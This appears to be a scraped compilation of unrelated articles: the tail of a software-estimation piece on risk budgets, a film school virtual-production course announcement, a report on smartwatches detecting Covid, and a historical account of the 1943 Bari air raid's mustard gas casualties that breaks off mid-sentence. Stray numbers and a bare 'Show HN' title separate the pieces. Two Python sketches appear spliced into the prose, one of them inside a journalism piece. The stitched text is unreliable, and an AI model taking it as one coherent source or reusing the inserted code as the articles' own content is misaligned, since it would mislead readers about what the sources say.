we’ll set bounds according to the time they’ll likely take. 
You don’t have to use exactly these sizes. Use whatever works for your team, but keep the number of sizes low and the maximum length short: anything bigger than “Large” becomes unwieldy, and lacks a rapid feedback loop. Anything shorter than “Small” doesn’t really need an estimate anyway. Crucially, we’ll also allocate each size a risk budget: So, given a size, can you tell if a piece of work fits into it? The next step is to run through your Interference Checklist, and come up with a Risk Score for the work. Let’s look at an example: perhaps you are adding a new screen to your system for capturing user preferences. It looks like it’ll be a couple of days effort, so is it “Small”? Maybe the Interference Checklist for it looks like this: So this piece of work exceeds the risk budget for a “Small” item, and needs to be classed as at least “Medium”. The implementer might get lucky and not hit any issues, but the chances are something on the checklist will need extra time. Note that above I just show a small sample of the full Interference Checklist. With a bigger list, the real risk scores are likely to go a lot higher… your mileage may vary. In my view, the poker planning / story point process fails to produce a reliable estimate. Mainly, this is not entirely the fault of story points - estimating software development tasks is akin to the Halting Problem. In this series of articles, we’ve looked at how software can at times have Fractal Complexity, be like a journey of discovery or have nested layers of complexity - it is hard. Nevertheless, experience shows us that there are common modes of failure for software estimates: things we try to estimate and fail at. Having an Interference Checklist and Risk Budgets addresses that deficit. The next article is a complete Interference Checklist that you can take and try out on your own projects.
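To make the sizing mechanics concrete, here is a minimal sketch of the approach described above: sum the risk scores from an Interference Checklist and take the smallest size whose risk budget covers the total. The budget values and the checklist items are illustrative assumptions, not figures prescribed by this article:

# Risk budgets per size are assumed values for illustration only.
RISK_BUDGETS = {"Small": 3, "Medium": 8, "Large": 20}

def size_for(checklist_scores):
    """Return the smallest size whose risk budget covers the checklist total."""
    total = sum(checklist_scores.values())
    for size, budget in sorted(RISK_BUDGETS.items(), key=lambda kv: kv[1]):
        if total <= budget:
            return size, total
    return "Too big - split the story", total

# Example: the hypothetical user-preferences screen discussed above.
checklist = {
    "Unclear definition of done": 2,
    "Touches existing functionality": 1,
    "Needs sign-off from another team": 2,
}
print(size_for(checklist))  # total of 5 exceeds the 'Small' budget, so at least 'Medium'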
1
Show HN: Doppel – Leverage Your Web Development
maelswarm/doppel
2
UK’s National Film TV School to Offer “Industry First” Virtual Production Course
Buoyed by its hugely successful use in the making of Disney+’s hit series and growing deployment in studios worldwide, virtual production will soon be offered as a course at one of the world’s most prestigious filmmaking colleges. In what it claims to be an “industry first,” the U.K.’s National Film and Television School, in partnership with WarnerMedia, WarnerMedia Access and StoryFutures Academy, is set to launch a new six-month, part-time certificate course in virtual production. Participants will be introduced to the core technical and filmmaking skills required to work on virtual production projects driven by Unreal Engine, with the course aimed at creatives from varied technical and creative backgrounds, including games, VFX, 3D animation, graphic design and those from camera department backgrounds. The first intake of the 24-week certificate will start at the end of January 2022, with an application deadline of Nov. 27. Made up of six modules, the course will be delivered via weekly online seminars, with six face-to-face weekend workshops taking place at the NFTS in Beaconsfield, making full use of its newly installed virtual production LED stage. As part of efforts to strengthen diversity and inclusion within the industry, scholarship funding will be made available, with WarnerMedia and WarnerMedia Access underwriting 75 percent of the course fee. Additionally, the school will provide further financial assistance to successful applicants from diverse groups who may require hardware or software upgrades, while travel grants will also be made available. “Virtual Production is quickly transforming the art and craft of filmmaking,” said NFTS director Jon Wardle. “As demand for skills in the VP landscape accelerates, being at the forefront of launching this innovative new course means we can equip creatives with the toolbox to understand how this exciting new leap in technology can help build and progress their career.” Added Karen Horne, WarnerMedia’s senior vp equity and inclusion: “The Virtual Production Certificate program is a wonderful addition to our talent activation initiatives at WarnerMedia Access. The skills and technology that the students are learning represent the future of production, and we are proud to partner with NFTS and to be leading the way with an inclusive lens.”
1
The dash to adapt smartwatches to help detect Covid infections
Five years ago, on a flight to Norway, Stanford University biologist Michael Snyder noticed that his body wasn’t behaving as it should. According to the multiple fitness trackers he happened to be wearing at the time, his heart rate was unusually high and his pulse ox — a measure of blood oxygen level — was unusually low. “When I landed, they never came back to normal,” he says. “So I knew something was up.” Snyder could guess what that something was: Two weeks earlier, he’d helped his brother install a fence in rural Massachusetts — tick country. Sure enough, soon after landing in Norway, he developed a fever consistent with Lyme disease. A Norwegian doctor gave him antibiotics to fight the infection until he returned home, when a test confirmed the diagnosis. “And the first clues were actually from my smartwatch and pulse ox,” Snyder says. “Pretty cool.” Snyder was wearing the devices as part of an ongoing study, started in 2010, in which his lab is tracking wearable and other data from about a hundred people, including him. (As we speak, he flashes his wrists, brandishing no fewer than four smartwatches.) “At the time we started, most people weren’t really even using them for health purposes,” he says — just to monitor daily activity. “We realized, Gosh, these are pretty good 24-7 monitors of your physiology.” He wondered what one could learn from all those data. Maybe a lot. In a review of Snyder’s personal smartwatch data over the two years before his Lyme disease experience, his team found evidence for three viral infections that had already been confirmed by testing — including one that was asymptomatic. “So every time I was ill, we could pick it up with high heart rate and skin temperature — prior to symptom onset,” he says. The researchers began to design algorithms to identify deviations from baseline vitals in anyone, with the goal of combining genetic, wearable and other data to predict metabolic disorders, estimate cardiovascular risk and make other health assessments remotely. Thus began a research path — now joined by labs around the world — that could enable smartwatches to detect when people are infected with Covid-19 before they’re tested, or even before they feel sick. In recent years, Snyder and a number of other research groups have used wearable devices to monitor heart health and detect infectious disease. Now, many have hope that the gadgets can be leveraged in the battle to stop the spread of Covid-19. SARS-CoV-2, the virus that causes Covid-19, has infected more than 100 million people and killed more than 2 million. Accelerating its spread, people carrying the virus can transmit it to others without knowing they’re infected. Massive rapid testing could curtail such transmission by alerting people to the infection, but most people don’t get tested every day, and there wouldn’t be sufficient resources to do so anyway. Finding ways to quickly identify those most likely to test positive could save lives. As Snyder suggests, the appeal of using smartwatches, fitness trackers and other such gadgets for this purpose is that they can monitor (depending on the device) heart rate, breathing rate, sleep, temperature, blood pressure and activity levels — and that tens of millions of Americans are already wearing them. “We see a potential to help” with Covid-19, says Giorgio Quer, the director of artificial intelligence at Scripps Research Translational Institute and one of the leaders of DETECT, one of the largest efforts so far to test this idea. 
In October, his team published a paper in Nature Medicine reporting on their findings in a study of 30,000 people who shared their health data last spring. They focused on device users who had been tested for Covid-19 at least once and who’d reported symptoms or lack thereof on a custom smartphone app. The study used a common accuracy metric called AUC; a high AUC requires minimizing both false positives and false negatives. The researchers’ primary question was whether wearable information — resting heart rate, sleep and activity — would add anything to self-reported symptoms. Indeed, it did. Using only symptoms, the simple hand-coded algorithm scored an AUC of 0.71. Daily sensor data alone performed about the same — 0.72. But by adding sensors to symptoms, the AUC reached 0.80, a statistically significant improvement. “The findings there are really exciting,” Quer says. In November, Snyder’s team at Stanford published a paper in Nature Biomedical Engineering describing their study of about 5,000 participants. It differs from the Scripps study in its resolution, zooming in on hour-by-hour changes in some measures. The Stanford group’s algorithm collects data on three signals, all relative to the person’s baseline — a high resting heart rate (a result of inflammation), a high ratio of resting heart rate to daily steps taken, and increased sleep (one way the body activates immune cells) — and looks for trends. Among 32 device wearers who had experienced Covid-19 symptoms, it detected signals related to reported symptoms a median of four days before those symptoms appeared. One limitation, though, is that this analysis, like the one at Scripps, was retrospective. That is, it looked back at data collected both before and after a prediction point, which isn’t much use if you want to catch infection as it happens. The eventual goal is a prospective system that detects possible illness in real time, helping wearers decide whether to seek testing or self-isolate. Snyder’s team did also evaluate their system in prospective mode. They ran a simulation: At any given point, if they ignored data they had collected after that point, could their system detect illness, even if there had been no reported symptoms? Twenty-four Fitbit wearers who’d gotten sick had enough presymptomatic data to test this hypothesis. In 15 of them, the system caught the illness. Stanford is now piloting a system that alerts wearable-device users to possible Covid-19 infection, using a two-alarm system. If signals surpass a certain threshold, it produces a yellow alarm. If they remain elevated for 12 hours, it produces a red alarm, strongly suggesting testing or isolating. If there were only a yellow alarm, Snyder says, frequent false alarms might cause some people to ignore alarms completely. Their system has already detected several cases in which the alarm has gone off prior to symptom onset, and it works with several watch types. Scripps is also designing an alert system, Quer says. Such systems don’t require FDA approval as long as they don’t offer diagnoses, he says. They might simply say you have an elevated heartrate, which correlates with various issues, including a respiratory virus such as Covid-19 or the flu. “It’s kind of like your thermometer,” Snyder says. “An elevated temperature could be due to several things.” One of the key challenges in any such alert system is the amount of uncertainty in the signal, making it hard to establish crisp baselines that, when breached, indicate a possible problem. 
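As a rough illustration of that two-alarm idea, here is a toy sketch of the logic: a yellow alarm when nightly resting heart rate rises well above the wearer's own baseline, and a red alarm when it stays elevated for 12 hours. The baseline window and thresholds are assumptions for illustration, not the published Stanford algorithm, and the noise sources discussed next are exactly what makes choosing them hard in practice:

from statistics import median

def check_alarms(resting_hr_by_hour, baseline_days=28, threshold_bpm=4, red_hours=12):
    """Return 'ok', 'yellow' or 'red' based on hourly resting heart rate."""
    # Baseline: median of the wearer's own history, excluding the most recent window.
    history = resting_hr_by_hour[:-red_hours] or resting_hr_by_hour
    baseline = median(history[-baseline_days * 24:])
    recent = resting_hr_by_hour[-red_hours:]
    elevated = [hr - baseline > threshold_bpm for hr in recent]
    if all(elevated):
        return "red"      # elevated for the full window: consider testing or isolating
    if elevated and elevated[-1]:
        return "yellow"   # currently elevated: keep watching
    return "ok"

# Example: a steady 60 bpm baseline followed by a sustained rise to 66 bpm.
series = [60] * 24 * 30 + [66] * 12
print(check_alarms(series))  # "red"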
Some people, for example, are on medications that muddy the data by affecting heart rate, or they have difficulty breathing due to severe asthma, as some did in Snyder’s study. And alarms can also be triggered by factors other than infection, including long flights, alcohol or stress. (“We call it the holiday bump,” Snyder says, whether due to travel or drinking or in-laws.) Researchers at Purdue University and a health technology company called physIQ are trying to meet this challenge in a study to improve wearable signals, with an eye toward Covid-19 detection. Participants wear a Samsung smartwatch and an electrocardiogram patch on their chest for five days. The patch collects more reliable heart rate data than the watch does. The researchers use it as training data so an algorithm can learn to interpret the watch data in a way that aligns with the patch data. Their goal is “to figure out how to get as much out of the wrist device as possible,” says Stephan Wegerich, physIQ’s chief science officer. The study also examines usability. Participants must wear the watch snugly to improve the signals, and, unlike with factory settings, it collects raw data at a high frequency, so users have to charge it twice a day for several hours to keep the battery alive. While that could make some casual smartwatch wearers balk, so far study participants haven’t complained. Craig Goergen, a bioengineer at Purdue, says it’s not been difficult for participants to figure out a routine that works for them. Worry over Covid-19 may motivate many more. One limitation to existing studies is that participants might be representative of smartwatch owners who are conscious of Covid-19 infection, but not representative of the wider population. Duke University’s CovIdentify project aims to ameliorate that problem. As in several other studies, anyone with a smartwatch can enroll, but, according to Jessilyn Dunn, a biomedical engineer at Duke, they’ve also given out 400 devices to those who didn’t have them. They’ve yet to report results. Meanwhile, Fitbit has conducted its own study, published in November in npj Digital Medicine. Their neural network, when limited to a false positive rate of 5 percent (the setting is adjustable), could detect 15 percent of Covid cases, and do so a day before onset of symptoms, using data from that day and the previous four. Not great, but better than nothing. Fitbit recently received $2.5 million from the Army to provide thousands of devices to healthcare workers and test a notification system for use in the field. But if you build it, will they come? “Even if these technologies exist, just having the technology alone is usually not enough,” says physician Mitesh Patel, director of the Penn Medicine Nudge Unit and coauthor of a paper in the Annual Review of Medicine on using wearable devices to monitor cardiovascular disease. “You might get the young and engaged, the quantified-selfers, to use these devices for Covid detection or heart rate variability,” he says. “But to get older patients, or the unmotivated, or patients of lower socioeconomic status, we have to think about mechanisms to both provide access and increase engagement.” Engagement is especially urgent, he says, because those are the groups that could benefit most from these types of algorithms. Behavioral nudges to encourage usage might include having families use them as a group, or having employers offer monetary incentives.
Patel and others say they’re encouraged by recent progress, and that wearables may eventually be used to inform clinical decisions, beyond everyday wellness applications. According to Snyder, what they’re learning about Covid-19 detection might be applied to future pandemics, seasonal flu and other areas of medicine and public health. It could potentially save many lives. “The pandemic has really brought all of that to a head,” says Dunn, of Duke. “So I’m excited for us to be able to demonstrate what these things can do.”
2
The Bombing and the Breakthrough
The old port town of Bari, on Italy’s Adriatic coast, was bustling. It was December 2, 1943. The British had taken Puglia’s capital in September, and though the front now lay just 150 miles to the north, the medieval city, with its massive cliffs cradling the sea, had escaped the fighting almost unscathed. Only a few miles outside of town, lines of women and children begged for black-market food, but here shop windows were full of fruit, cakes and bread. Young couples strolled arm in arm. Even ice cream vendors were doing a brisk trade. Bari was a Mediterranean service hub, supplying the 500,000 Allied troops engaged in driving the Germans out of Italy. Grand waterfront buildings were recently designated the headquarters of the United States Fifteenth Air Force. The liberating Tommies had already chased the Nazis from the skies over Italy, and the British, who controlled the port, were so confident they had won the air war that Air Marshal Sir Arthur Coningham announced that Bari was all but immune from attack. “I would regard it as a personal affront and insult if the Luftwaffe should attempt any significant action in this area,” he said that day at a press conference. Four days earlier, the American Liberty ship John Harvey had pulled in with a convoy of nine other merchantmen, and some 30 Allied ships were crammed into the harbor, packed against the seawall and along the pier. Their holds were laden with everything from food and medical gear to engines, corrugated steel for landing strips, and 50-gallon drums of aviation fuel. Visible on the upper decks were tanks, armored personnel carriers, jeeps and ambulances. Bright lights winked atop huge cranes that hoisted baled equipment up and out. At 7:35 p.m.—a blinding flash followed by a terrific bang. The ancient port’s single antiaircraft battery opened fire. Then came an earsplitting explosion, then another, and another. German Junkers Ju-88s flew in low over the town, dropping bombs short of the harbor. Smoke and flames rose from the city’s winding streets. As incendiaries rained down on the harbor, turning night into day, gunners aboard the anchored ships scrambled to shoot down the enemy—too late. The attacking German airplanes fled into the night. The raid lasted less than 20 minutes. Soon a tremendous roar came from the harbor. An exploding ammunition tanker sent a huge rolling mass of flames a thousand feet high. A reporter for Time magazine noted a “fiery panorama.” Eight ships were already “burning fiercely,” he wrote, and the “entire center of the harbor was covered with burning oil.” A ruptured bulk-fuel pipeline sent thousands of gallons gushing into the harbor, where it ignited into a gigantic sheet of flame, engulfing the entire north side of the port. Flames leapt from ship to ship. Crews worked frantically to free ships before raging fires forced them to jump overboard and swim for it. The attack on Bari, which the press called “a little Pearl Harbor,” shook the complacency of the Allied forces, who had been convinced of their air superiority in Italy. All told, the Nazis sunk 17 Allied ships and destroyed more than 31,000 tons of valuable cargo. More than 1,000 American and British servicemen were killed, and almost as many wounded, along with hundreds of civilians. In the crucial days that followed, the task of treating gravely injured sailors would be made even more difficult by wartime secrecy.
It would be almost 30 years before the world would learn the truth about what really took place that night, and even today few are aware of the surprising role of the disaster and its impact on the lives of ordinary Americans. Lt. Col. Stewart Francis Alexander, asleep in his quarters at Allied Force Headquarters in Algiers, was awake at the first harsh jangle of the telephone. There appeared to be a developing medical crisis in Bari. Too many men were dying, too quickly, of unexplained causes. The symptoms were unlike anything military physicians had seen before, and they had begun to suspect that the Germans had used an unknown poison gas. There was an urgent request for assistance. Alexander, a medical officer attached to the staff of Gen. Dwight D. Eisenhower at AFHQ, had received special training in chemical warfare. He was being dispatched immediately to the scene. Alexander looked young for a combat physician. Five-foot-eight and skinny, he was 29, and only the hair thinning at his temples lent him an air of authority. He was popular with the troops, though some patients kidded that his gentle bedside manner was best suited to a pediatrician. But he had been through the brutal invasion of North Africa under Maj. Gen. George S. Patton, and despite a quiet modesty Alexander had proven himself determined and resourceful. He could have sat out the war in a stateside hospital or research laboratory, but the desire to serve ran deep. He was descended from self-made immigrants, part of a wave of Eastern European Jews who, fleeing famine and persecution, journeyed to the United States in the 1880s and ’90s and were forever grateful for the opportunity afforded them in their new home. Alexander’s father was an old-fashioned family practitioner in Park Ridge, New Jersey, and Alexander’s one ambition was to follow in his footsteps. After excelling at the Staunton Military Academy, in Virginia, he entered Dartmouth College at age 15. A standout in his science courses, he was allowed to advance directly to medical school in his senior year, graduating at the top of his class in 1935. After completing Dartmouth’s two-year program, he earned his medical degree from Columbia University, and did his residency training in New York. Then Alexander returned home, where he proudly hung his shingle next to his father’s. They enjoyed their shared dream of practicing medicine together for only a few months. In the spring of 1940, Alexander notified the draft board that he was “available any time.” He was called up in November and spent time with the 16th Infantry Regiment, stationed at Gunpowder Military Reservation, in Maryland, not far from Edgewood Arsenal, home of the Chemical Warfare Service, or CWS. Before long, he contacted CWS with an innovative new design for spectacles that fit within the facepiece of a gas mask. (He was granted a patent on the spectacles, but he turned the rights over to the Army.) Transferred to Edgewood, Alexander underwent a crash course in poison gases, consulting specialists and experimenting on animals to evaluate toxic agents and forms of treatment; he even investigated agents’ medicinal potential. After Pearl Harbor, he taught Army medical personnel how to treat chemical casualties. He was promoted to director of the Medical Division of CWS’s Research Laboratory at age 27, and when General Patton embarked in October 1942 with 35,000 troops to attack the coast of Morocco, the first time U.S.
ground forces would face Axis armies, Alexander accompanied him as the Consultant in Chemical Warfare Medicine to the Western Task Force. Now, at 5 p.m. on December 7, 1943, five days after the attack on Bari, Alexander’s plane touched down at the city airfield. Waiting for him on the tarmac was the district’s senior British Royal Army Medical Corps officer and a group of hospital directors. “Their agitation was immediately apparent,” Alexander recalled, “and I was taken to the hospital at once.” The 98th British General Hospital, located in a large complex of brick buildings 15 minutes from the harbor, had been spared. Built on the monumental scale beloved by the Fascists, the Bari Polyclinic housed sizable medical wards, a surgical block and laboratories. “With every fresh explosion, the building creaked and rattled, rocking like a ship in a storm,” E. M. Somers Cocks, a nurse from New Zealand, recalled of the attack. “Doors were wrenched off hinges, windows were shattered, and the bricked-up windows scattered their bricks like hail.” A concussion blast knocked out the power, plunging the hospital into darkness. They were still sweeping up glass when the wounded began to arrive—hundreds of bloodied sailors suffering from shock, burns and exposure. Almost all of them were covered in thick, black crude oil. The litter-bearers brought up the rear, carrying the grievously injured. These were sailors who had jumped from blazing ships, or swum through pools of flaming oil, and were horribly burned. With so many patients needing urgent attention, there was no time to get many sailors out of their soiled clothes, so the ward matrons did what they could. The “immersion” cases received a shot of morphine, blankets to keep them warm and strong, hot, sweet tea. Then they were left to rest. A British nurse, Gwladys Rees, remembered trying to fix an intravenous line by the light of a match while the wind blew through shattered windows. “We worked by the dim glow of hurricane lamps, long into the night and early morning,” she recalled. “Intravenous bottles were dripping from every third bed, and the corridors were crammed with patients for whom we could find no accommodation.” The first "unusual" indication, the doctors informed Alexander, was that casualties did not present typical symptoms or respond to treatment in the typical manner. Many patients, despite a thready pulse and low blood pressure, did not appear to be in clinical shock. Instead of being restless or anxious, they were apathetic—some even said they felt “rather well”—and their extremities were warm rather than cold. After dawn, nurses observed that a few of the men complained of being thirsty, even though orderlies had just gone around with the drinks cart. Suddenly there were so many men clamoring for water the whole ward was in an uproar. Patients were yelling about the intense heat, tearing off their clothing, and, in their frenzy, trying to rip off their bandages. Overnight, the majority of immersion cases had developed red and inflamed skin, with blisters “as big as balloons and heavy with fluid,” Rees recalled. This, together with widespread nausea and vomiting, led doctors to think the cause might be poisonous fumes, possibly from the fuel oil and explosives. “We began to realize that most of our patients had been contaminated by something beyond all imagination,” she said. Six hours after the attack, patients who had managed to fall asleep awoke complaining of eye pain. 
They said their eyes felt “gritty, as though sand particles had gotten in,” Alexander wrote in his report. Within 24 hours, the wards were full of men with eyes swollen shut. As the staff’s unease deepened, British naval headquarters sent a notification that there was a “possibility of blister gas exposure” among the casualties. The hundreds of burn patients with unusual symptoms were to be classified “Dermatitis N.Y.D.”—not yet diagnosed—pending further instructions. Given the crush of casualties that first night, nonurgent cases who had appeared in “good condition” were sent away, sometimes in their wet uniforms. The next morning many returned, clearly needing treatment. Nurses tried to clean them up, scrubbing the black scum from patients’ skin with kerosene, but many took a turn for the worse. “We did everything humanly possible, but it was no good,” Rees said. “It was horrible to see these boys, so young and in so much obvious pain. We couldn’t even give them strong sedatives, since we weren’t quite sure how they would react with whatever had poisoned them.” The first unexplained death occurred 18 hours after the attack. Within two days, there were 14. Alexander noted the startling downward spiral. “Individuals that appeared in rather good condition in a matter of minutes would become moribund and die,” the doctors told him. The British doctors were mystified. The symptoms did not correspond to case histories of mustard gas poisoning from World War I, or to manuals issued by the Chemical Warfare Service. If the toxic agent was mustard—named for its unpleasant garlicky odor—respiratory complications should have been more prominent. Several days later, patients with no previous respiratory problems became congested and developed very sore throats, making it hard to swallow. These patients died not as a result of broncho-pneumonia, as might have been expected, but from cardio-circulatory failure. Alexander walked the crowded wards. He examined patients, gently lifting blankets to study their wounds. With extraordinary delicacy, he probed the strange patches of thickened red skin. He spoke with each patient in turn, asking how he had come by his injuries. Which ship was he on? How did he come to be rescued? Did he receive first aid at the docks? What about at the hospital? One sailor after another told of being caught in the firestorm, of the pandemonium, of somehow making it to the hospital. There they had waited for as long as 12 and even 24 hours before receiving treatment. Drawing back the covers from one patient, Alexander studied the burns on an otherwise healthy body. The sailor said he had been aboard a PT boat in the harbor when the German bombers flew over. He heard a loud boom as a nearby ship blew up, and the boat was hightailing it back to shore when he felt a spray of oily liquid land on his neck and run down his chest and back. Alexander observed the outline of raw, raised skin, shiny with ointment, delineating where he had been sprayed, as if the splash had been imprinted on his flesh. The burns Alexander had seen on other patients were varied, but already he could distinguish between chemical burns and those caused by fire and heat: “Certain patterns were present depending on how the individual had been exposed.” It appeared to Alexander that sailors who had been thrown overboard and completely immersed in the harbor were burned extensively, while those in boats had comparatively superficial burns wherever the toxic soup had hit them. 
Several men who had sat in the solution, possibly in lifeboats, had only local burns of the buttocks and groin. A few lucky souls who took it upon themselves to wipe off the oily mixture that first night sustained only minor injuries. As he made his rounds, it was increasingly clear to Alexander that most of these patients had been exposed to a chemical agent. His sense of smell supported his hypothesis. Entering the hospital, he had noticed something different from the usual cloying mix of sweat, urine and disinfectant. “Traces of an odor implanted in my mind said mustard gas,” he later recalled. He knew that the three most common blister agents were sulfur mustard, lewisite and nitrogen mustard. Although generally referred to as “gas,” all three agents were liquids at room temperature. And all three produced skin injuries resembling burns and serious eye injuries. Particularly worrying was the new, pure-grade nitrogen mustard developed by the Germans, which Alexander had studied the previous year, at Edgewood, after two classified samples were smuggled out of Germany. Its effects were reportedly more rapid than sulfur mustard, and it could penetrate intact skin and cause systemic poisoning. Practically colorless and odorless, apart from a faint fishy smell, it was not easily detected in the field. The Germans were also known to use mixtures of blister agents, so any combination was a real possibility. It had been five days since the initial exposure, and if there was any chance of saving the hundreds of Allied sailors lying in hospitals all over Bari, plus countless Italian civilians, he would need to act swiftly. He decided to put the question directly to the commanding officer of the 98th General Hospital, Col. Wellington J. Laird. “I feel these men may have been exposed to mustard in some manner, Colonel,” Alexander said tentatively. “Do you have any idea how this might have happened?” As the chemical warfare consultant to AFHQ, Alexander was cleared to the “highest degree.” He knew the Allies had begun secretly stockpiling poison gas in the Mediterranean, in case Germany, with its back against the wall, resorted to all-out chemical warfare. But he was skeptical that the Allies would have shipped mustard shells into a busy port like Bari and allowed the toxic cargo to sit there as a prime target for an enemy strike. Still, Alexander couldn’t rule it out. Tactfully, he tried again. “Have you checked with the port authorities?” he asked Laird. “Could the ships in the harbor have been carrying mustard?” Laird replied, “I have, and they tell me they have no such information available.” The burden of proof rested on him. He ordered a series of tests for the patients who were still alive, and insisted on “careful and complete autopsies” on patients who had died under mysterious circumstances. He ordered samples of the harbor waters collected and analyzed. He borrowed personnel from displaced hospital units and put them to work gathering data, performing lab tests on tissue samples and compiling pathology reports. Suspecting that Laird had dodged his question, Alexander visited Navy House, the British admiralty’s local headquarters. Weary after the long day, he was blunt: Was there mustard gas in Bari Harbor? This was again “absolutely denied.” Alexander left unconvinced. What he needed was proof. But this was not the familiar menace he had studied at Edgewood. This was a new horror, “mustard gas poisoning though in a different guise than that recognized from WWI,” he wrote later.
At first light, Stewart Alexander headed for the harbor. He picked his way through mounds of rubble and surveyed the twisted skeletal remains of the Allied convoys. Out on the mole, men were working like ants, removing jagged chunks of concrete and scrap metal. The port, which had been closed for five days and swept for mines, had partially reopened that morning. A number of burned-out vessels had already been towed out to sea and sunk or blown apart. A coal barge still smoldered on a quay close by, and the fly ash stung his nostrils. The dark oil-slimed water in the harbor basin looked sinister. One sailor had recalled that the floating oil had been a foot thick on the surface of the water after the raid. It was a mixture of high-octane gasoline and fuel from two dozen Allied ships and, Alexander suspected, mustard gas or a derivative, possibly dropped by the Germans among the incendiary bombs. Alexander wondered what other agents might have been thrown into the mix. The Germans possessed phosphorus and magnesium bombs, both of which would have caused deep chemical burns and eye injuries. Another possibility was that an Allied cargo ship had been carrying white phosphorus shells and smoke pots—designed to mask approaches and unnerve the enemy—which were released when the vessel was hit. If it was an aerial gas attack, determining which ships were hit and in what order would help him understand which crews suffered the most direct exposure. Even men not on the water would have inhaled significant doses of the noxious vapor as it spread across the harbor—some of it sinking, some burning, some mixing with the tons of oil floating on the surface, and some evaporating and mingling with the clouds of smoke and flame. German planes could have dropped time-fused mustard bombs that would burst open approximately 200 feet above the water or, in a low-altitude “spray attack,” could have released liquid mustard from tanks that would then have been transformed by the slipstream into tiny droplets resembling a vapor. Alexander reasoned that in either case the attack would have contaminated all the ships in the inner harbor, including the crippled vessels that remained afloat, and drenched all the men on the docks below. Yet Alexander had found no evidence of mustard contamination in his survey of the dock area. And the Royal Navy personnel he interviewed appeared shocked at the suggestion that poison gas might have been released in the air raid. “Mustard?” one British officer repeated in surprise, shaking his head. “That’s impossible. There’s no mustard here.” When he spoke with British port authorities, they continued to “state categorically that there was no mustard in the area.” Undeterred, Alexander described in detail the ghastly burns he had seen at the hospital, and he insisted there was no way those injuries could have been sustained by anything except chemical exposure. Of the 534 men admitted to the Allied hospitals following the attack, 281 were suffering from symptoms consistent with mustard poisoning. That day, 45 had died. These were just the documented cases. Many more fatalities could be expected if they did not receive proper treatment urgently. The vast majority of the victims were British—their own countrymen. The authorities began to waver. They allowed that if mustard gas was present in the harbor, “it could only have come from the German planes.” Alexander considered the ramifications of the charge that Hitler, in a desperate gamble, had risked a gas offensive. 
But coming as it did after a string of firm denials of so much as a whiff of mustard in Bari, it seemed to Alexander too neat an explanation. For days he pored over the clinical records. “Reading the reports,” he wrote, “is to take a journey into the nightmare of the effects of chemical contamination.” From his training, Alexander knew that agents such as mustard are toxic in vapor or liquid form when they reach the eyes, nose, lungs or gastrointestinal tract. But the chemicals can also be absorbed by the skin. And any toxic agent in contact primarily with the epidermis would, therefore, result in delayed clinical signs—as was the case with the baffling Bari victims. These were the symptoms he bore in mind as he studied the case of Seaman Philip Henry Stone, a patient who had abruptly died after asking for a drink. The doctors had pointed to him as an example of one of the inexplicable “early deaths.” The pathologist noted “a generalized dusky erythema,” or reddened skin, on the chest, abdomen and thighs, and many blisters on the face, ears, arms, back and external genitalia. “The lips were dull black in color,” he wrote. During the autopsy, the pathologist also found that the esophagus displayed a “curious black longitudinal streaking,” probably due to dead cells and tissue. The lungs, a mottled blackish-red color, were congested, the bronchi were filled with pus, and the trachea engorged with fluid. The stomach showed the same black areas, and there were necrotic areas near the opening, most likely caused by swallowing a diluted solution of mustard mixed with oil. After studying the reports, Alexander concluded that many sailors who sustained blast injuries would not have succumbed to the hemorrhages were it not for other complications: “The serious consequences of imposing the mustard vapor injury upon a lung partially damaged or bruised by blast is at once apparent.” Alexander was still trying to decide how best to proceed, given the official resistance to his diagnosis, when he received stunning news. A diver he had ordered to search the harbor floor had found fractured gas shells. Tests performed on-site revealed traces of mustard. Ordnance officers from the U.S. Air Force identified the casings as belonging to a 100-pound M47A2 mustard gas bomb. German mustard gas bombs were always marked with the distinctive Gelb Kreuz, or yellow cross. This bomb was definitely American. Alexander’s instincts were right—an Allied ship, later identified as the John Harvey, had been carrying a cargo of mustard gas. The secret shipment had most likely been destined for a chemical stockpile at Foggia, 75 miles away, in order to improve the U.S. capability to retaliate against a German chemical attack. As Alexander knew from his training, the M47 bomb was made of simple sheet metal, designed to hold white phosphorus or liquid sulfur mustard. Although the M47A2 model was coated inside with an oil to protect it from corrosion caused by the agent, the bombs were still fragile. They would have been blown to pieces in the German bombardment, releasing lethal mustard into the atmosphere and the oily harbor water. Alexander found it hard to believe that this was the first time British officials were learning of the chemical weapons. The circumstances of the accident would need further investigating, as would the extent to which the military authorities had covered up the escaped gas. By failing to alert hospital staff to the risk of contamination, they had greatly added to the number of fatalities. 
At that moment, however, Alexander’s patients took precedence. Now that his suspicions were confirmed, he could advise the staff at Allied hospitals on proper treatment for mustard exposure and try to reduce the number of deaths. Instead of bringing matters to a close, however, Alexander’s discovery that mustard gas had come from the Allies’ own supply had made a difficult job that much more complicated. The British port officials’ attempts to obfuscate rankled, but that paled in comparison to their effort to shift responsibility to the Luftwaffe. It was not a harmless fabrication. Alexander shuddered to think about the “grave political implications.” He later recalled thinking, “If they were going to accuse the Germans of dropping mustard when the Germans had not....” Earlier that year, President Roosevelt had issued a stern warning that any Axis use of chemical weapons would be followed by the “fullest possible retaliation.” The significance of “any error in interpreting the factor of and source of mustard gas in Bari,” Alexander recalled, “was horrendous.” If the Allied leaders drew the faulty conclusion that the enemy had deployed chemical weapons, it could trigger widespread chemical warfare. Adding to his anxiety, the daily death toll from mustard contamination, which had started to decline, suddenly spiked, demonstrating the secondary effects of pneumonia on patients already weakened by chemical exposure. There seemed no way to predict how many more men would die. Nine days after the bombing, Alexander gave his initial findings to AFHQ in Algiers. “The burns in the hospitals in this area labeled ‘dermatitis N.Y.D.’ are due to mustard gas,” he asserted. “They are unusual types and varieties because most of them are due to mustard which has been mixed into the surface oil in the harbour.” Alexander felt growing urgency that his diagnosis be recognized at the highest levels. Some British medical personnel appeared to be waiting for an official stamp of approval before implementing his treatment strategies. More important, there could be no misunderstanding the source of the mustard. He sent high-priority cables to both the American president and the British prime minister, informing them of the nature of the casualties at Bari and the almost certain origin of the gas on an American Liberty ship. Roosevelt appeared to accept his findings, and responded: “Please keep me fully informed.” Churchill, however, sent a terse reply: He did not believe there was mustard gas in Bari. Alexander was speechless. He admired Churchill, and he speculated that the British leader’s overriding concern was that the Allies “not acknowledge we had poison gas in that theater of operation because if the Germans retaliated they would be dropping poison gas on England.” There was no questioning the wisdom of this command decision, but Churchill’s opposition undermined Alexander’s credibility and ability to do his job. Alexander sent a second telegram. He cited his findings at much greater length, stating “beyond any doubt” that these casualties were due to mustard exposure. He was informed that Churchill maintained that “the symptoms do not sound like mustard gas,” which Churchill had witnessed firsthand during World War I. His instructions were the same: “The doctor should reexamine his patients.” Flummoxed, and unsure how a “lowly, lonely American medical officer” was 